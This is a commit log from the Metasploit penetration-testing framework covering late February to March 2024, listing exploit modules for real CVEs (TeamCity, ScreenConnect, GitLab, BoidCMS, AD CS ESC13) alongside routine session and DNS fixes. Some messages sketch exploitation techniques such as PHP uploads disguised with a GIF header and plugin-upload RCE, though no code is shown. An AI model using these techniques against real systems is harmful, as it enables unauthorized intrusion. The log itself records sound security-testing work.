Land #18960 , improves handling of dying SMB and SQL sessions
2024-03-20 16:06:04 +00:00
Dean Welch
7e3048d2f7
Grammar
2024-03-20 15:45:07 +00:00
adfoster-r7
0399768f39
Land #18974 , Consistently refer to black hole as two words
2024-03-20 15:42:26 +00:00
Dean Welch
686acb4c7b
Correctly format CreateSession option in output
2024-03-20 15:06:20 +00:00
Spencer McIntyre
b363f6f87d
Alias blackhole to black-hole in the UI
2024-03-20 10:57:04 -04:00
cgranleese-r7
961a072de4
Improves handling of dying SMB and SQL sessions
2024-03-20 14:16:01 +00:00
adfoster-r7
c9fe98b522
Bump Metasploit version to 6.4.0
2024-03-20 13:46:08 +00:00
Dean Welch
4946fc297f
Add user affordance for scanner modules that can create a new session
2024-03-20 12:14:49 +00:00
Spencer McIntyre
2b3a723557
Consistently refer to black hole as two words
2024-03-19 20:49:28 -04:00
Jack Heysel
d03dfe8991
Land #18841 , Update sap_icm_paths.txt wordlist
...
This PR updates the sap_icm_paths.txt wordlist with the newest enteries.
2024-03-19 16:40:09 -07:00
DaveYesland
1a8233dfe7
msftidy cleanup
2024-03-19 14:52:28 -07:00
DaveYesland
e32d05eab8
Add module and docs for CVE-2024-1212
2024-03-19 11:37:12 -07:00
bwatters
1e47b33857
Land #18971 , Adjust multiple DNS related things
...
Merge branch 'land-18971' into upstream-master
2024-03-19 12:34:51 -05:00
Metasploit
7f761d074d
automatic module_metadata_base.json update
2024-03-19 11:56:36 -05:00
Spencer McIntyre
b3b6f79594
Update the presentation of static entries
...
Keep the first line blank for consistency with rules and sort hostnames
and addresses.
2024-03-19 12:48:13 -04:00
Spencer McIntyre
0cf4737317
Add specs for resolver spell checking
2024-03-19 12:48:13 -04:00
Spencer McIntyre
5b1d0100d2
Add spell checking for resolvers
2024-03-19 12:48:07 -04:00
Spencer McIntyre
0f9986c787
Land #18947 , Fix inconsistent casing
...
Fix inconsistent casing in windows/local/wmi_persistence
2024-03-19 12:40:34 -04:00
cgranleese-r7
ca97d5d9eb
Land #18965 , Remove stale documentation link
2024-03-19 16:06:55 +00:00
adfoster-r7
ff775b7b23
Remove stale documentation link
2024-03-19 13:46:35 +00:00
Spencer McIntyre
e8b99343a6
Add static entries examples and fix black hole
2024-03-19 09:13:21 -04:00
Metasploit
7c7fa36685
automatic module_metadata_base.json update
2024-03-18 15:56:27 -05:00
Jack Heysel
bf0d81db03
Land #18838 , Improve Runc Priv Esc Check
...
This PR adds support for Debian and number of fixes and improvements for
the runc_cwd_priv_esc. Proir to this fix the module would report
vulnerable for a number of versions that the patch had been back ported
to.
2024-03-18 13:31:09 -07:00
h00die-gr3y
e84fe947c2
third release module and documentation updates
2024-03-15 23:33:29 +00:00
h00die-gr3y
5dd75e174b
second release module and documentation
2024-03-15 18:27:59 +00:00
h00die-gr3y
df0012a63f
initial release module
2024-03-15 16:10:05 +00:00
Gaurav Jain
287b07281d
Use Rex Parser to parse options for sessions command
2024-03-15 18:50:19 +05:30
Gaurav Jain
02713fcadb
Update tests for sessions command
2024-03-15 01:26:18 +05:30
adfoster-r7
15c56a870e
Land #18895 , Add upload/download/delete/mkdir/rmdir to smb session
2024-03-14 10:51:48 +00:00
Metasploit
7cabfd7855
Bump version of framework to 6.3.61
2024-03-14 03:35:21 -05:00
Metasploit
d2c19efeac
automatic module_metadata_base.json update
2024-03-13 19:28:29 -05:00
adfoster-r7
55dd5aa9c0
Land #18899 , update ysoserial viewstate tool
2024-03-14 00:12:38 +00:00
h00die
251aa021e1
rancher audit logs module
2024-03-13 16:42:51 -04:00
Christophe De La Fuente
44c5422e07
Land #18922 , JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198)
2024-03-13 20:16:27 +01:00
cgranleese-r7
d2c599eaf4
Land #18954 , Ensure modules honor spooler settings
2024-03-13 16:48:30 +00:00
sfewer-r7
6d84f0e898
reduce the size of teh exploit method by spinngin out two new methods create_payload_plugin and auth_new_admin_user. several if/unless blocks were flattened to be inline if/unless
2024-03-13 09:58:51 +00:00
sfewer-r7
4bd105202a
improve the readability of the XML
2024-03-13 09:29:43 +00:00
sfewer-r7
b04e84ed99
clarify we must call this a second time
2024-03-13 09:17:18 +00:00
sfewer-r7
df2c94f873
anther typo
2024-03-13 09:14:23 +00:00
Stephen Fewer
b9e82375c1
typo
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-03-13 09:13:11 +00:00
Stephen Fewer
d7bf7bc2ea
Use Failure::NoAccess as a better failure error, as we are trying to login
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-03-13 09:12:56 +00:00
Stephen Fewer
46dd21d69d
use ||= to assign new hash if needed
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-03-13 09:11:42 +00:00
h00die
6a3b918be2
rancher cve from 2021
2024-03-12 16:24:38 -04:00
Christophe De La Fuente
fbbaf69050
Land #18949 , notify the user the DNS feature requires a restart
2024-03-12 20:15:15 +01:00
Christophe De La Fuente
8989b3226f
Update the wording for the DNS feature warning restart message
2024-03-12 20:14:22 +01:00
adfoster-r7
4292488925
Ensure modules honor spooler settings
2024-03-12 18:01:23 +00:00
Metasploit
923f4c9f7b
automatic module_metadata_base.json update
2024-03-12 11:45:17 -05:00
adfoster-r7
81e96d3e71
Land #18952 , Updates Postgres hashdump module to now work with newer versions of Postgres
2024-03-12 16:29:01 +00:00
cgranleese-r7
1baf86842e
Land #18951 , Update acceptance test readme
2024-03-12 16:26:08 +00:00
dwelch-r7
d88185bff0
Land #18945 , Fix crash when running http crawler with database connected
2024-03-12 16:13:44 +00:00
cgranleese-r7
a33e7a72b0
Updates Postgres hashdump module to now work with newer versions of Postgres
2024-03-12 16:13:04 +00:00
adfoster-r7
9a9c27bb60
Fix crash when running http crawler with database connected
2024-03-12 15:47:32 +00:00
adfoster-r7
290656faaf
Update acceptance test readme
2024-03-12 15:25:23 +00:00
Metasploit
b52d79ec49
automatic module_metadata_base.json update
2024-03-12 09:27:23 -05:00
cgranleese-r7
4e0e3da74c
Land #18835 , clean up code duplication
2024-03-12 14:09:22 +00:00
Spencer McIntyre
a366f6a819
The DNS feature requires a restart, so flag it
...
Also rename DNS_FEATURE to simply DNS because in this context, the
FEATURE suffix is redundant.
2024-03-12 09:58:52 -04:00
Christophe De La Fuente
f4fedc2195
Land #18868 , Add documentation for the new DNS command
2024-03-12 14:08:08 +01:00
Spencer McIntyre
c8d50bda0f
Add documentation for the new DNS command
2024-03-12 08:59:08 -04:00
Dean Welch
689caf4bd1
Add upload/download/delete/mkdir/rmdir to smb session
2024-03-12 11:56:29 +00:00
Christophe De La Fuente
69f368b8f4
Land #18944 , Fix saving and loading DNS rules from the config
2024-03-12 12:10:58 +01:00
cgranleese-r7
d964edde11
Land #18932 , Add postgres acceptance tests
2024-03-12 10:36:46 +00:00
Adrian Șendroiu
2007e6d8fb
Fix inconsistent casing in windows/local/wmi_persistence
2024-03-12 12:17:46 +02:00
Spencer McIntyre
65cc577694
Fix saving and loading DNS rules from the config
2024-03-11 14:55:36 -04:00
sfewer-r7
1e371d0e4a
resolve teh Java payload issue on Linux by leveraging PayloadServlet, runnign teh payload in a thread, and forcing teh default optiosn for Spawn to be 0
2024-03-11 18:06:44 +00:00
SickMcNugget
67fcd57a1f
Merge branch 'runc_priv_esc' of github.com:SickMcNugget/metasploit-framework into runc_priv_esc
2024-03-11 22:23:55 +08:00
SickMcNugget
6c1b4c1421
Update check to account for backports
2024-03-11 22:19:18 +08:00
Metasploit
172a200525
automatic module_metadata_base.json update
2024-03-11 09:10:38 -05:00
Zach Goldman
7ce91df66e
clean up code duplication
2024-03-11 09:09:46 -05:00
Christophe De La Fuente
0252429715
Land #18775 , Adding new module for MinIO (CVE-2023-28432)
2024-03-11 14:46:59 +01:00
adfoster-r7
49a5f0d113
Land #18937 , fix docs typo
2024-03-11 10:27:57 +00:00
sfewer-r7
0513654f10
Fix edge case for java payloads when Spawn is set to 0, all access to the plugin will block. We can still get a session if we fall through here. We cant delete the plugin as access will block because we did not spawn.
2024-03-08 17:09:14 +00:00
sfewer-r7
ab0327fb33
clarify we are using SpEL not OGNL here
2024-03-08 15:57:46 +00:00
cudalac
980c5053f4
Peer Review
2024-03-08 08:54:38 -05:00
h00die-gr3y
7f02daf37d
use send_request_cgi for payload delivery
2024-03-08 10:53:45 +00:00
dotslashsuperstar
7539c3b958
Added arguments to db_import
2024-03-08 00:28:15 -08:00
Josh
4078707933
fix typo
2024-03-07 23:28:29 +01:00
h00die
b41e38bca3
mongodb ops manager diagnostic archive info disclosure
2024-03-07 17:05:25 -05:00
h00die-gr3y
66e7f3c582
third release module
2024-03-07 21:22:14 +00:00
Spencer McIntyre
fc2d5c2659
Fix ldap auto authentication
...
When the auth method is set to auto and a domain is specific, use NTLM.
2024-03-07 14:04:08 -05:00
Spencer McIntyre
7bce40308a
Update module data to improve discoverability
2024-03-07 13:28:22 -05:00
Metasploit
1d764c1780
automatic module_metadata_base.json update
2024-03-07 08:05:54 -06:00
Christophe De La Fuente
ba75b3bb3f
Land #18716 , gitlab password reset account takeover (CVE-2023-7028)
2024-03-07 14:40:29 +01:00
cgranleese-r7
169ea31673
Land #18930 , Adds a help command within the interactive query prompt
2024-03-07 12:07:15 +00:00
adfoster-r7
0139ed61d1
Land #18931 , adds notification when initially entering a SQL shell within SQL session types
2024-03-07 11:50:05 +00:00
cgranleese-r7
0fad7bbe1c
Adds a notification when initially interatcing with SQL shell via command
2024-03-07 11:34:45 +00:00
Dean Welch
2a68e04292
Update help message
2024-03-07 11:03:07 +00:00
adfoster-r7
e7bc17cab3
Add postgres acceptance tests
2024-03-07 10:35:45 +00:00
Metasploit
b91b718077
Bump version of framework to 6.3.60
2024-03-07 03:34:49 -06:00
adfoster-r7
a3a331a07a
Land #18926 , updates new sessions to have a consistent local file system API
2024-03-06 17:03:58 +00:00
Metasploit
05a7698773
automatic module_metadata_base.json update
2024-03-06 11:00:31 -06:00
Christophe De La Fuente
e20558ec35
Land #18821 , Gitlab public email disclosure CVE-2023-5612
2024-03-06 17:39:24 +01:00
Christophe De La Fuente
f872535c68
Small missing updates before it land
2024-03-06 17:37:33 +01:00
Dean Welch
60431057ad
Adds a help command within the interactive query prompt
2024-03-06 16:32:16 +00:00
Metasploit
8f759af4de
automatic module_metadata_base.json update
2024-03-06 10:09:24 -06:00
cgranleese-r7
64831b67f1
Update new session to have a consistent local fs API
2024-03-06 15:52:09 +00:00
Spencer McIntyre
23e0abe2f6
Land #18686 , ssh_version module
2024-03-06 10:32:01 -05:00
cgranleese-r7
b114058389
Land #18928 , Don't close smb client when it comes from the session
2024-03-06 15:29:02 +00:00
cgranleese-r7
c411802163
Land #18929 , Update yard dependencies
2024-03-06 15:17:28 +00:00
adfoster-r7
c3eca46de4
Update yard dependencies
2024-03-06 14:56:11 +00:00
Dean Welch
936b311a1b
Don't close smb client when it comes from the session
2024-03-06 14:20:34 +00:00
cgranleese-r7
9af1f6970a
Land #18920 , Fix smb session autorun
2024-03-06 12:20:44 +00:00
adfoster-r7
76e27ed208
Land #18924 , allow selecting auxiliary modules in RPC
2024-03-06 11:49:05 +00:00
h00die
8b6f7594e4
ssh_version module
2024-03-05 17:18:24 -05:00
h00die
c4837d09e9
ssh_version module
2024-03-05 17:15:43 -05:00
Metasploit
7b595d2354
automatic module_metadata_base.json update
2024-03-05 15:33:49 -06:00
Spencer McIntyre
9b8b7045ff
Land #18715 , Add Splunk library
2024-03-05 16:17:30 -05:00
Spencer McIntyre
57bc748e9c
Land #18921 , Add ip to smb session prompt
2024-03-05 15:17:26 -05:00
Gaurav Jain
985b0ba47f
Add reviewed changes to splunk library
2024-03-06 01:32:57 +05:30
Spencer McIntyre
b30f264630
Land #18844 , fix #file_dropper_exist? for Window
...
Bugfix Msf::Exploit::FileDropper#file_dropper_exist? for Windows sessions
2024-03-05 15:01:20 -05:00
h00die-gr3y
7dbd25bcbf
added documentation
2024-03-05 18:42:09 +00:00
Metasploit
e7a520738d
automatic module_metadata_base.json update
2024-03-05 12:38:24 -06:00
adfoster-r7
4eb4c3b025
Land #18923 , Use HTTPS link for postgres_sql reference
2024-03-05 18:19:28 +00:00
sjanusz-r7
41d458f038
Allow selecting auxiliary modules in RPC
2024-03-05 17:55:05 +00:00
sjanusz-r7
1667da7b07
Use HTTPS link for postgres_sql reference
2024-03-05 17:49:13 +00:00
Dean Welch
b473b6de77
Add ip to smb session prompt
2024-03-05 15:23:21 +00:00
Dean Welch
2399c2a393
Fix smb session autorun
2024-03-05 15:07:53 +00:00
sfewer-r7
5c56d6a4fc
typo
2024-03-05 14:47:04 +00:00
sfewer-r7
b925f798e5
typo and clarify description
2024-03-05 14:39:17 +00:00
sfewer-r7
aac4ef09cc
add in disclosure date and blogs
2024-03-05 11:09:22 +00:00
RadioLogic
cbbb6cbda4
Merge branch 'master' into docker-kernel-module-escape
2024-03-04 22:58:18 -05:00
jheysel-r7
1124e347df
Fix rubocop error
2024-03-04 18:39:58 -05:00
jheysel-r7
bf59f58661
Update modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
2024-03-04 18:34:35 -05:00
h00die
a524682f63
x11 screenshot module progress
2024-03-04 17:40:01 -05:00
Metasploit
95283f7d3e
automatic module_metadata_base.json update
2024-03-04 13:57:33 -06:00
Christophe De La Fuente
1e8e6d3bc4
Land #18796 , Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966
2024-03-04 20:35:22 +01:00
Christophe De La Fuente
39af0bf535
Set Java target default paylaod to java/meterpreter/reverse_tcp
2024-03-04 20:33:27 +01:00
h00die-gr3y
6bc74364e1
second release module
2024-03-04 18:57:54 +00:00
cgranleese-r7
9b2b042e19
Land #18875 , Add conditional option validation depending on SESSION/RHOST connection
2024-03-04 17:36:52 +00:00
Dean Welch
2df926ae1d
Yard doc required options
2024-03-04 17:13:16 +00:00
Metasploit
2eaec5b9a8
automatic module_metadata_base.json update
2024-03-04 09:14:08 -06:00
cgranleese-r7
4fc9e269ae
Land #18862 , Align SQL sessions peerhost and peerport
2024-03-04 14:57:26 +00:00
sfewer-r7
d748adcf80
check the expected response from a patched server
2024-03-04 14:32:39 +00:00
sjanusz-r7
3c8f43e23e
Align SQL sessions peerhost and peerport
2024-03-04 13:11:32 +00:00
Metasploit
e912509715
automatic module_metadata_base.json update
2024-03-04 06:41:30 -06:00
dwelch-r7
28a38f3aa0
Land #18908 , Update SAMR computer and ICPR cert to support SMB sessions
2024-03-04 12:20:53 +00:00
cgranleese-r7
97ef5cf827
Land #18903 , Update sql prompt on db change
2024-03-04 11:23:44 +00:00
adfoster-r7
06593b02b2
Land #18911 , Resolve deprecation warnings from actions/checkout in Github actions
2024-03-04 10:54:24 +00:00
h00die
7f6be50855
review of ssh_version improvements
2024-03-03 17:59:00 -05:00
h00die-gr3y
5d20321153
first release module
2024-03-03 19:38:02 +00:00
h00die
f2d836d008
review of ssh_version improvements
2024-03-03 09:18:52 -05:00
dotslashsuperstar
e1b232b58b
Add extra cves and urls to vuln references when importing OpenVAS.
2024-03-03 05:55:45 -08:00
KanchiMoe
ac7c06e18c
Upversion Github Actions
2024-03-02 14:30:54 +00:00
h00die
69b89c5d95
WIP x11 screenshots and lib
2024-03-01 15:15:39 -05:00
h00die
bd956e7aef
WIP x11 screenshots and lib
2024-03-01 15:14:43 -05:00
adfoster-r7
8e5f26fac0
Land #18905 , update the SMB session pwd command output to be in line with SMB client output
2024-03-01 20:07:59 +00:00
adfoster-r7
76166c0d14
Update SAMR computer and ICPR cert to support SMB sessions
2024-03-01 17:53:58 +00:00
sfewer-r7
a5fb83d0e1
add in 2023.11.2 as tested on
2024-03-01 17:03:38 +00:00
sfewer-r7
9988117cca
rename with cve number
2024-03-01 16:42:59 +00:00
sfewer-r7
fa4a16df5e
add in cve number
2024-03-01 16:39:38 +00:00
Balgogan
1f05f9a0f1
Add recommendation
2024-03-01 14:36:13 +01:00
sjanusz-r7
8184035d57
Show query help on empty query call
2024-03-01 11:33:13 +00:00
sjanusz-r7
82486e712c
Early return on nil query result
2024-03-01 11:28:28 +00:00
sjanusz-r7
6b11cd4332
Fix tests broken by updating SQL prompt on DB change
2024-03-01 11:27:52 +00:00
sjanusz-r7
1b73044203
Correctly handle changing of databases and the query return values for SQL sessions
2024-03-01 11:27:52 +00:00
Metasploit
401cdca09b
automatic module_metadata_base.json update
2024-02-29 23:48:56 -06:00
Jack Heysel
a73a7531a9
Land #18827 , Add module for BoidCMS CVE-2023-38836
...
This is an authenticated RCE against BoidCMS versions 2.0.0 and earlier.
The underlying issue is that the file upload check allows a php file to
be uploaded and executes as a media file if the GIF header is present in
the PHP file.
2024-02-29 21:31:44 -08:00
Metasploit
ee681cdb79
automatic module_metadata_base.json update
2024-02-29 17:20:20 -06:00
adfoster-r7
d4791f966b
Land #18904 , change bloodhound OutputDirectory to OptString
2024-02-29 23:03:13 +00:00
adfoster-r7
d10909c961
Land #18887 , Adds support for searching by session types
2024-02-29 22:38:20 +00:00
adfoster-r7
4d85a8dff9
Land #18902 , Update github action libraries
2024-02-29 22:29:16 +00:00
adfoster-r7
703e9ba68d
Land #18896 , Resolve deprecation warnings from setup-python in Github actions
2024-02-29 22:28:53 +00:00
Spencer McIntyre
bcb4e3aa9d
Update the help output in the docs page too
2024-02-29 16:56:06 -05:00
Spencer McIntyre
d09053cde5
Add the viewstate generator as an option
2024-02-29 16:56:06 -05:00
Spencer McIntyre
3e80e04b34
Adjust option validation
2024-02-29 16:56:06 -05:00
Spencer McIntyre
f1a9d9988a
Update the dot_net.rb tool help output
2024-02-29 16:56:06 -05:00
Spencer McIntyre
0975f99305
Add viewstate options
2024-02-29 16:55:59 -05:00
Spencer McIntyre
87f91f284a
Add unit tests for the new rex viewstate library
2024-02-29 16:55:54 -05:00
Spencer McIntyre
88ea9af859
Add ESC2 and ESC3 templates too
2024-02-29 16:15:39 -05:00
Spencer McIntyre
b2c5a4f335
Print some additional attributes for debugging
2024-02-29 16:15:39 -05:00
Spencer McIntyre
dfb271d883
Don't crash when attributes are missing
2024-02-29 15:07:34 -05:00
bwatters
550c6f030a
Updates based on jheysel-r7's suggestions
2024-02-29 12:42:22 -06:00
adfoster-r7
fcbb3bddfa
Update github action libraries
2024-02-29 15:51:23 +00:00
cgranleese-r7
0c1bcbf275
Adds support for searching by session types
2024-02-29 15:15:40 +00:00
cgranleese-r7
fcba49d23a
Update pwd output to be inline with smb client output
2024-02-29 15:11:40 +00:00
Patrick Double
8b1ff6d44e
change bloodhound OutputDirectory to OptString
...
OptPath is intended for a local path and performs validation. Attempting to set it to a target path that doesn't exist on the local fails.
2024-02-29 07:12:37 -06:00
sjanusz-r7
6fe9ef5f8c
Align SQL clients to use current_database
2024-02-29 12:34:54 +00:00
cgranleese-r7
17315653a5
Land #18901 , Fix Rex MySQL wrapper test to have correct method symbol
2024-02-29 11:48:16 +00:00
sjanusz-r7
bc4362d07d
Fix Rex MySQL wrapper test to have correct method symbol
2024-02-29 11:16:18 +00:00
Metasploit
a0dc757cb8
automatic module_metadata_base.json update
2024-02-29 05:06:39 -06:00
adfoster-r7
b0123eab2e
Land #18890 , rename shell to query_interactive for sql session types, add -i flag
2024-02-29 10:41:06 +00:00
adfoster-r7
d8abd2bcc2
Land #18898 , Add rex proto mysql client wrapper
2024-02-29 10:13:47 +00:00
dwelch-r7
a4543b0f41
Land #18897 , Update smb login to support additional configuration
2024-02-29 10:07:02 +00:00
Metasploit
435759bb47
Bump version of framework to 6.3.59
2024-02-29 03:39:23 -06:00
sfewer-r7
f0ca5c10dc
we can shuffle thequery params so teh jsp param is not first. we can optionally add soem charachters before the trailing .jsp
2024-02-29 09:13:44 +00:00
Jack Heysel
4fe861c653
Land #18878 , Update rspec gems
...
This PR updates a number of rspec gems which help improve test suite
error messages when string encodings are different.
2024-02-28 20:37:11 -08:00
adfoster-r7
131585235b
Update SMB Login to support additional configuration
2024-02-28 20:24:06 +00:00
Balgogan
45ae984dc1
Add additional verification step
2024-02-28 20:30:58 +01:00
Balgogan
b3d45f7d9b
Fix oversight and further optimize code execution
2024-02-28 20:16:14 +01:00
Jack Heysel
8ce95003fe
Rubocop
2024-02-28 11:09:34 -08:00
Jack Heysel
6589b86a4c
Updated check method to account for backports
2024-02-28 11:04:38 -08:00
Balgogan
9f87510b50
Optimize code structure and enhance vulnerability check
2024-02-28 20:02:31 +01:00
sjanusz-r7
b423241e6b
Use Rex Post MySQL Client for lib, specs & modules
2024-02-28 18:19:50 +00:00
sjanusz-r7
55a8d6732f
Add Rex Proto MySQL Client
2024-02-28 18:19:46 +00:00
Metasploit
42255a27a6
automatic module_metadata_base.json update
2024-02-28 10:13:56 -06:00
adfoster-r7
26214cbfd2
Land #18889 , Fresh SQL prompt when pressing enter if no input was provided
2024-02-28 15:40:43 +00:00
Jack Heysel
4b54d43db5
Land #18892 , Add AD CS Updates for ESC13
...
This PR adds functionality to enable Metasploit users
to be able to exploit the latest ESC technique, ESC13.
2024-02-28 07:28:16 -08:00
Spencer McIntyre
1726767fdf
Update the workflow docs for ESC13
2024-02-28 08:48:30 -05:00
Spencer McIntyre
8bc6705557
Move viewstate signing logic into Rex
2024-02-27 14:37:55 -05:00
KanchiMoe
a887682e0f
Upversion setup-python to v5
2024-02-27 19:20:22 +00:00
h00die
75d007b44c
WIP x11 screenshots and lib
2024-02-27 12:52:22 -05:00
Zach Goldman
17d8fa2335
rename shell to query_interactive for sql session types, add -i flag
2024-02-27 11:38:04 -06:00
adfoster-r7
334f9e5ff9
Land #18893 , updates the help command to consistently format columns
2024-02-27 17:04:00 +00:00
sjanusz-r7
efba30031d
Fix early returns in Reline prompt
2024-02-27 16:59:38 +00:00
sfewer-r7
b7200b52e1
typo
2024-02-27 14:58:56 +00:00
sjanusz-r7
d51aa30fff
Rex Table command column width based on longest dispatcher command with sane default
2024-02-27 13:11:24 +00:00
sfewer-r7
f52543b4a6
Older version of TeamCity (circa 2018) do not support access tokens, so we can fall back on creating an admin user accoutn before we upload the plugin. Creating an access token is better as we can delete the token, unlike the user account.
2024-02-27 12:01:57 +00:00
sfewer-r7
8bca294966
use the Faker library
2024-02-27 12:00:38 +00:00
Spencer McIntyre
75c6dcdc15
Detect templates that are vulnerable to ESC13
2024-02-26 17:28:42 -05:00
Spencer McIntyre
3cbf46c5b7
Reuse the ldap connection once established
2024-02-26 17:28:42 -05:00
Spencer McIntyre
4a51e028d8
Print multiple attributes on individual rows
2024-02-26 17:28:41 -05:00
Spencer McIntyre
97f75c19e4
Show the objectSID of groups as well
2024-02-26 17:28:41 -05:00
Spencer McIntyre
fefc3cb73c
Show names for issuance policy OIDs
2024-02-26 17:28:31 -05:00
Balgogan
f04b66d6dd
Add wp_bricks_builder_rce
2024-02-26 22:09:38 +01:00
h00die
453f8bbeff
more x11 progress, now working on screenshots, WIP
2024-02-26 15:16:47 -05:00
sjanusz-r7
488d4c0387
Fresh SQL prompt when pressing enter if no input was provided
2024-02-26 16:49:15 +00:00
Simon Janusz
b91430c878
Land #18886 , Removes the 'run' command from SMB and SQL session types
2024-02-26 14:38:36 +00:00
cgranleese-r7
76a1518eab
Removes the run command from SMB and SQL session type and improves smb session pwd commands error message
2024-02-26 10:55:11 +00:00
adfoster-r7
787a2cb19e
Land #18872 , add support for boolean datatypes on mssql
2024-02-26 10:51:58 +00:00
Gaurav Jain
1eea790759
Update spec tests for Msf::Ui::Console::CommandDispatcher::Session.rb
...
- Fixes spec test for sessions command where session id should be
sent as a string and not as an integer
2024-02-25 17:35:53 +05:30
Gaurav Jain
597807316e
Add -i option to Session mixin's sessions command
2024-02-25 15:32:46 +05:30
Metasploit
3759346f10
automatic module_metadata_base.json update
2024-02-23 13:43:57 -06:00
Jack Heysel
f2de6d6357
Land #18870 , Add ConnectWise ScreenConnect module.
...
This PR add an unauthenticatd RCE exploit for ConnectWise
ScreenConnect (CVE-2024-1709).
2024-02-23 11:25:33 -08:00
Jack Heysel
03e5b36008
Land #18833 , fix for issue #18561
...
This PR catches an exception when updating a non-existing session.
Prior to this PR trying to run sessions -k after running workspace -D
would result in a stacktrace being printed to the console.
2024-02-23 11:18:03 -08:00
h00die
5e42df8cd4
more x11 progress
2024-02-23 13:53:07 -05:00
Dean Welch
39f518eebb
Conditionally validate only when session type is enabled
2024-02-23 18:08:09 +00:00
sfewer-r7
d7a0dee7d1
@rad10 noted the download link we gave no longer works, but has provided a second link, so adding that to the docs
2024-02-23 17:54:14 +00:00
sfewer-r7
ebe6e54259
use the Faker module to gen the plugins metadata.
2024-02-23 17:48:01 +00:00
sfewer-r7
fe8867356e
we can use Faker::Internet.uuid here instead of rolling our own uuid maker
2024-02-23 17:47:28 +00:00
sfewer-r7
f3af1836ce
allow a custom USERNAME and PASSWORD to be specified if needed. Will default to a random value. Also use Faker::Internet.email to gen an email address
2024-02-23 17:46:49 +00:00
Dean Welch
355d5c2426
Enable new session types for tests
2024-02-23 17:45:19 +00:00
Dean Welch
559ab0f10d
Add tests for optional session mixins
2024-02-23 17:12:25 +00:00
adfoster-r7
7c000bc101
Land #18880 , Fix typo in SASL supported mechanisms
2024-02-23 17:12:00 +00:00
Jeffrey Martin
dee2f2aa0d
Fix typo in SASL supported mechanisms
2024-02-23 10:29:47 -06:00
adfoster-r7
9ae9e06017
Land #18879 , update kerberos/inspect_ticket to include PAC credential information
2024-02-23 16:20:57 +00:00
Spencer McIntyre
0ade721bf1
Propagate precise encryption key length errors
2024-02-23 10:28:05 -05:00
Spencer McIntyre
94587433cd
Add a presenter for the PAC credential information
2024-02-23 09:48:09 -05:00
Spencer McIntyre
ca562a95d8
Truncate private data at 88 chars
...
Truncating at 87 was the exact length to trim the last byte of an AES256
kerberos key. Furthermore, adding the (TRUNCATED) string to the end
caused the resuting value to be larger than the original trucated value.
2024-02-23 09:46:44 -05:00
sfewer-r7
47596c6a0c
add in docs
2024-02-23 14:30:53 +00:00
sfewer-r7
30e761831e
we can also register this path for cleanup
2024-02-23 14:00:27 +00:00
Dean Welch
244e20a3d5
Update expected error in tests
2024-02-23 12:47:48 +00:00
sfewer-r7
d5bcac1370
improve check routine to include target platform
2024-02-23 11:49:38 +00:00
Spencer McIntyre
257ec484c7
Show names for x509 OID constants
2024-02-22 17:36:30 -05:00
Spencer McIntyre
4b7f4e2b0d
Just show the DN, commas and all
...
This way the DN can just be copy-pasted into locations where a DN is
expected.
2024-02-22 17:36:30 -05:00
h00die
d85f2575a9
Thanks adfoster for spec fixes
2024-02-22 16:20:40 -05:00
adfoster-r7
8fca7d188f
Update rspec libraries
2024-02-22 21:02:37 +00:00
h00die
e7ca9485ed
working xspy code
2024-02-22 15:34:20 -05:00
h00die
794e304cee
working but ugly code
2024-02-22 15:31:16 -05:00
h00die
7292877b18
more progress, broke up lib x11 into different files/folders
2024-02-22 15:30:14 -05:00
sfewer-r7
003d5e7006
The check routine can now display the targets platform in addition to the version number (we can determine this with a single request, so there is no major change here). This is usefull so you know what platform to set the exploits target to (so you can select an appropriate payload). Thanks @iagox86 for the idea!
2024-02-22 19:23:48 +00:00
Zach Goldman
d65827367f
Land #18874 Fix undefined mssql_query method call on mssql client
2024-02-22 13:35:04 -05:00
errorxyz
97513d473f
Update manageengine_endpoint_central and servicedesk_plus default payloads
2024-02-23 00:00:18 +05:30
Metasploit
a183289945
automatic module_metadata_base.json update
2024-02-22 12:17:58 -06:00
Dean Welch
8bc50c1d3a
Add conditional option validation depending on SESSION or RHOST connection
2024-02-22 17:57:20 +00:00
adfoster-r7
f3a637b4e9
Land #18873 , fix the create session datastore option from appearing for payloads
2024-02-22 17:50:52 +00:00
Zach Goldman
854dcc5776
add support for boolean datatypes on mssql
2024-02-22 11:08:49 -06:00
sfewer-r7
27a1233de8
Turns out only x64 is supported on Windows, so remove ARCH_X86, as if we try to inject an x86 payload in-memory we crash the target x64 service.
2024-02-22 16:41:18 +00:00
sjanusz-r7
a07d1c88be
Fix undefined mssql_query on mssql client
2024-02-22 16:41:10 +00:00
sfewer-r7
79bfbe4310
now that Linux is a target we have to move this to the multi directory
2024-02-22 16:34:43 +00:00
Spencer McIntyre
2c09f385d6
Land #18849 , Improve visual indentation
...
Improve visual indentation logic for tables
2024-02-22 11:23:53 -05:00
cgranleese-r7
d52220cccb
Fixes the create session datastore option from appearing for payloads
2024-02-22 14:58:41 +00:00
sfewer-r7
65cb30b0a4
update docs
2024-02-22 14:55:02 +00:00
sfewer-r7
0b14d1b495
add a Linux command payload target, tested on version 20.3.31734. We leverage the path traversal CVE-2023-1708 to ensure the dropped ASHX file can be reached. This was blocking the Linux target from working. Also works fine on Windows. We leverage FileDropper mixin to delete this file.
2024-02-22 14:54:45 +00:00
sfewer-r7
8b4fee010c
remove the full stop to make it easier to copy andpast the password (and not accidentaly copy the full stop charachter)
2024-02-22 14:52:18 +00:00
adfoster-r7
d76dd4a7fb
Improve visual indentation logic for tables
2024-02-22 14:43:29 +00:00
Gaurav Jain
b2cb102c9b
Merge branch 'rapid7:master' into manageengine
2024-02-22 17:20:28 +05:30
Gaurav Jain
51dcd5c971
Update splunk cve-2023-32707 to use reviewed changes
2024-02-22 17:13:44 +05:30
adfoster-r7
4af5c5438f
Land #18830 , SQL sessions consolidation
2024-02-22 11:42:11 +00:00
Metasploit
c5eb4eb8a9
Bump version of framework to 6.3.58
2024-02-22 03:35:01 -06:00
Christophe De La Fuente
a1a0df74eb
Land #18866 , Update Windows 11 Mimikatz support - update metasploit-payloads gem to 2.0.166
2024-02-22 09:50:35 +01:00
sfewer-r7
eded0e7788
POST the payload.encoded data when we trigger the ASHX file, this way we dont drop the Metasploit payload to disk.
2024-02-21 23:38:35 +00:00
